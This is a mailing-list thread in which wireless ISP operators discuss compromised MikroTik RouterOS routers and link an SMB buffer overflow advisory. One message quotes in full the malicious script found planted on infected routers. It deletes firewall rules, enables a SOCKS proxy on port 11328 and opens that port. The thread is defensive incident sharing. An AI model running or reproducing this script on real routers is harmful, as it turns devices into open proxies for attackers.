I only found it on boards that had Hotspot enabled. Did others find it on ones without Hotspot?
From: mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org> On Behalf Of Bruce Bridegwater via Mikrotik-users Sent: Sunday, August 5, 2018 9:06 PM To: 'Shawn C. Peppers' <videodirectwispal...@gmail.com>; 'Mikrotik Users' <mikrotik-users@wispa.org>; Bob Pensworth <beeper.bo...@gmail.com> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 We found the same about 10 days ago.. Upgraded to most current OS and firmware versions, changed winbox port to a 5 digit port and changed user name from admin and 10 digit alpha numeric symbol password. Only found it on wan interface that has a public ip. On almost all boards including ccr devices. Thought it was just us as we were at 6.41.3 or older. _____ From: mikrotik-users-boun...@wispa.org <mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org <mailto:mikrotik-users-boun...@wispa.org> > on behalf of Bob Pensworth via Mikrotik-users <mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> > Sent: Sunday, August 5, 2018 7:57:53 PM To: 'Shawn C. Peppers'; 'Mikrotik Users' Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 We are finding an IP/Socks connection: We are finding an event entry in System/Scheduler And the (below) script in System/Script: /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1; -- Bob Pensworth, WA7BOB | General Manager <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-0000, x1 From: mikrotik-users-boun...@wispa.org <mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org <mailto:mikrotik-users-boun...@wispa.org> > On Behalf Of Shawn C. Peppers via Mikrotik-users Sent: Friday, March 16, 2018 11:54 AM To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; memb...@wisp.org <mailto:memb...@wisp.org> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 I have not tested this yet but.... https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflo w :: // Shawn Peppers :: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>
_______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org http://lists.wispa.org/mailman/listinfo/mikrotik-users
